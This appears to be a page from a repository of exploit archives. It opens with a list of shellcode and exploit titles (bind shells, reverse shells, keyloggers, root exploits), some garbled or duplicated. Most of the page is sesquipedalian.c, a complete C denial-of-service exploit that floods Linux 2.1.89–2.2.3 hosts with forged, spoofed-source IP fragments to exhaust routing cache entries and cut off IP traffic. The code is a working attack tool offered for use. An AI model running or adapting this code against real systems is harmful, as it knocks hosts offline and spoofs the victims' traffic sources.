2a57bee5c6
12 new exploits Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) Linux/x86 - execve shellcode null byte free (Generator) Linux/x86 - execve Null Free shellcode (Generator) Linux/x86 - cmd shellcode null free (Generator) Linux/x86 - cmd Null Free shellcode (Generator) iOS - Version-independent shellcode Linux/x86-64 - bindshell port:4444 shellcode (132 bytes) Linux/x86-64 - bindshell port 4444 shellcode (132 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes) Windows 5.0 < 7.0 x86 - null-free bindshell shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Win32 - telnetbind by Winexec shellcode (111 bytes) Win32 - telnetbind by Winexec 23 port shellcode (111 bytes) Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes) Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes) Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Win32 - Add new local administrator shellcode _secuid0_ (326 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337shellcode ARM - Bindshell port 0x1337 shellcode Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Linux Kernel <= 2.4.0 - Stack Infoleaks bsd/x86 - connect back Shellcode (81 bytes) FreeBSD/x86 - connect back Shellcode (81 bytes) Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit Linux Kernel 2.0 / 2.1 - SIGIO Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.2 - 'ldd core' Force Reboot Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options Linux Kernel 2.2.x - Non-Readable File Ptrace Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2) Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux/x86 - Reverse TCP Bind Shellcode (92 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shel shellcode l (96 bytes) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes) Mainframe/System Z - Bind Shell shellcode (2488 bytes) Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes) OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) Ubuntu Apport - Local Privilege Escalation Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation Linux/x86-64 - Bindshell with Password shellcode (92 bytes) Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes) Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Linux/x86-64 - bind TCP port shellcode (103 bytes) Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow) Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
254 lines
6.5 KiB
C
Executable file
254 lines
6.5 KiB
C
Executable file
/*
|
|
source: http://www.securityfocus.com/bid/2247/info
|
|
|
|
Linux kernel versions 2.1.89 to 2.2.3 are vulnerable to a denial of service attack caused when a 0-length IP fragment is received, if it is the first fragment in the list. Several thousands 0-length packets must be sent in order for this to initiate a denial of service against the target.
|
|
*/
|
|
|
|
/*
|
|
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
|
|
*
|
|
* by horizon <jmcdonal@unf.edu>
|
|
*
|
|
* This sends a series of IP fragments such that a 0 length fragment is first
|
|
* in the fragment list. This causes a reference count on the cached routing
|
|
* information for that packet's originator to be incremented one extra time.
|
|
* This makes it impossible for the kernel to deallocate the destination entry
|
|
* and remove it from the cache.
|
|
*
|
|
* If we send enough fragments such that there are at least 4096 stranded
|
|
* dst cache entries, then the target machine will no longer be able to
|
|
* allocate new cache entries, and IP communication will be effectively
|
|
* disabled. You will need to set the delay such that packets are not being
|
|
* dropped, and you will probably need to let the program run for a few
|
|
* minutes to have the full effect. This was written for OpenBSD and Linux.
|
|
*
|
|
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
#include <netdb.h>
|
|
#include <arpa/inet.h>
|
|
|
|
struct my_ip_header
|
|
{
|
|
unsigned char ip_hl:4, /* header length */
|
|
ip_v:4; /* version */
|
|
unsigned char ip_tos; /* type of service */
|
|
unsigned short ip_len; /* total length */
|
|
unsigned short ip_id; /* identification */
|
|
unsigned short ip_off; /* fragment offset field */
|
|
#define IP_RF 0x8000 /* reserved fragment flag */
|
|
#define IP_DF 0x4000 /* dont fragment flag */
|
|
#define IP_MF 0x2000 /* more fragments flag */
|
|
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
|
|
unsigned char ip_ttl; /* time to live */
|
|
unsigned char ip_p; /* protocol */
|
|
unsigned short ip_sum; /* checksum */
|
|
unsigned long ip_src, ip_dst; /* source and dest address */
|
|
};
|
|
|
|
struct my_udp_header
|
|
{
|
|
unsigned short uh_sport;
|
|
unsigned short uh_dport;
|
|
unsigned short uh_ulen;
|
|
unsigned short uh_sum;
|
|
};
|
|
|
|
#define IHLEN (sizeof (struct my_ip_header))
|
|
#define UHLEN (sizeof (struct my_udp_header))
|
|
|
|
#ifdef __OpenBSD__
|
|
#define EXTRA 8
|
|
#else
|
|
#define EXTRA 0
|
|
#endif
|
|
|
|
unsigned short checksum(unsigned short *data,unsigned short length)
|
|
{
|
|
register long value;
|
|
u_short i;
|
|
|
|
for(i=0;i<(length>>1);i++)
|
|
value+=data[i];
|
|
|
|
if((length&1)==1)
|
|
value+=(data[i]<<8);
|
|
|
|
value=(value&65535)+(value>>16);
|
|
|
|
return(~value);
|
|
}
|
|
|
|
unsigned long resolve( char *hostname)
|
|
{
|
|
long result;
|
|
struct hostent *hp;
|
|
|
|
if ((result=inet_addr(hostname))==-1)
|
|
{
|
|
if ((hp=gethostbyname(hostname))==0)
|
|
{
|
|
fprintf(stderr,"Can't resolve target.\n");
|
|
exit(1);
|
|
}
|
|
bcopy(hp->h_addr,&result,4);
|
|
}
|
|
return result;
|
|
}
|
|
|
|
void usage(void)
|
|
{
|
|
fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
|
|
exit(0);
|
|
}
|
|
|
|
|
|
void sendem(int s, unsigned long source, unsigned long dest,
|
|
unsigned short sport, unsigned short dport)
|
|
{
|
|
static char buffer[8192];
|
|
struct my_ip_header *ip;
|
|
struct my_udp_header *udp;
|
|
struct sockaddr_in sa;
|
|
|
|
bzero(&sa,sizeof(struct sockaddr_in));
|
|
sa.sin_family=AF_INET;
|
|
sa.sin_port=htons(sport);
|
|
sa.sin_addr.s_addr=dest;
|
|
|
|
bzero(buffer,IHLEN+32);
|
|
|
|
ip=(struct my_ip_header *)buffer;
|
|
udp=(struct my_udp_header *)&(buffer[IHLEN]);
|
|
|
|
ip->ip_v = 4;
|
|
ip->ip_hl = IHLEN >>2;
|
|
ip->ip_tos = 0;
|
|
ip->ip_id = htons(random() & 0xFFFF);
|
|
ip->ip_ttl = 142;
|
|
ip->ip_p = IPPROTO_UDP;
|
|
ip->ip_src = source;
|
|
ip->ip_dst = dest;
|
|
udp->uh_sport = htons(sport);
|
|
udp->uh_dport = htons(dport);
|
|
udp->uh_ulen = htons(64-UHLEN);
|
|
udp->uh_sum = 0;
|
|
|
|
/* Our first fragment will have an offset of 0, and be 32 bytes
|
|
long. This gets added as the only element in the fragment
|
|
list. */
|
|
|
|
ip->ip_len = htons(IHLEN+32);
|
|
ip->ip_off = htons(IP_MF);
|
|
ip->ip_sum = 0;
|
|
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
|
|
|
|
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
|
|
{
|
|
perror("sendto");
|
|
exit(1);
|
|
}
|
|
|
|
/* Our second fragment will have an offset of 0, and a 0 length.
|
|
This gets added to the list before our previous fragment,
|
|
making it first in line. */
|
|
|
|
ip->ip_len = htons(IHLEN);
|
|
ip->ip_off = htons(IP_MF);
|
|
ip->ip_sum = 0;
|
|
ip->ip_sum = checksum((u_short *)buffer,IHLEN);
|
|
|
|
if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
|
|
{
|
|
perror("sendto");
|
|
exit(1);
|
|
}
|
|
|
|
/* Our third and final frag has an offset of 4 (32 bytes), and a
|
|
length of 32 bytes. This passes our three frags up to ip_glue. */
|
|
|
|
ip->ip_len = htons(IHLEN+32);
|
|
ip->ip_off = htons(32/8);
|
|
ip->ip_sum = 0;
|
|
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
|
|
|
|
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
|
|
{
|
|
perror("sendto");
|
|
exit(1);
|
|
}
|
|
}
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
int sock;
|
|
int on=1,i;
|
|
unsigned long source, dest;
|
|
unsigned short sport=53, dport=16384;
|
|
int delay=20000, count=15000;
|
|
|
|
if (argc<3)
|
|
usage();
|
|
|
|
while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
|
|
{
|
|
switch (i)
|
|
{
|
|
case 's': sport=atoi(optarg);
|
|
break;
|
|
case 'd': dport=atoi(optarg);
|
|
break;
|
|
case 'n': count=atoi(optarg);
|
|
break;
|
|
case 'u': delay=atoi(optarg);
|
|
break;
|
|
default: usage();
|
|
}
|
|
}
|
|
|
|
argc-=optind;
|
|
argv+=optind;
|
|
|
|
source=resolve(argv[0]);
|
|
dest=resolve(argv[1]);
|
|
|
|
srandom(time((time_t)0)*getpid());
|
|
|
|
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
|
|
{
|
|
perror("socket");
|
|
exit(1);
|
|
}
|
|
|
|
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
|
|
{
|
|
perror("setsockopt: IP_HDRINCL");
|
|
exit(1);
|
|
}
|
|
|
|
fprintf(stdout,"\nStarting attack on %s ...",argv[1]);
|
|
|
|
for (i=0; i<count; i++)
|
|
{
|
|
sendem(sock,source+htonl(i),dest,sport,dport);
|
|
if (!(i%2))
|
|
usleep(delay);
|
|
if (!(i%100))
|
|
{
|
|
if (!(i%2000))
|
|
fprintf(stdout,"\n");
|
|
fprintf(stdout,".");
|
|
fflush(stdout);
|
|
}
|
|
}
|
|
|
|
fprintf(stdout,"\nDone.\n");
|
|
exit(1);
|
|
}
|
|
|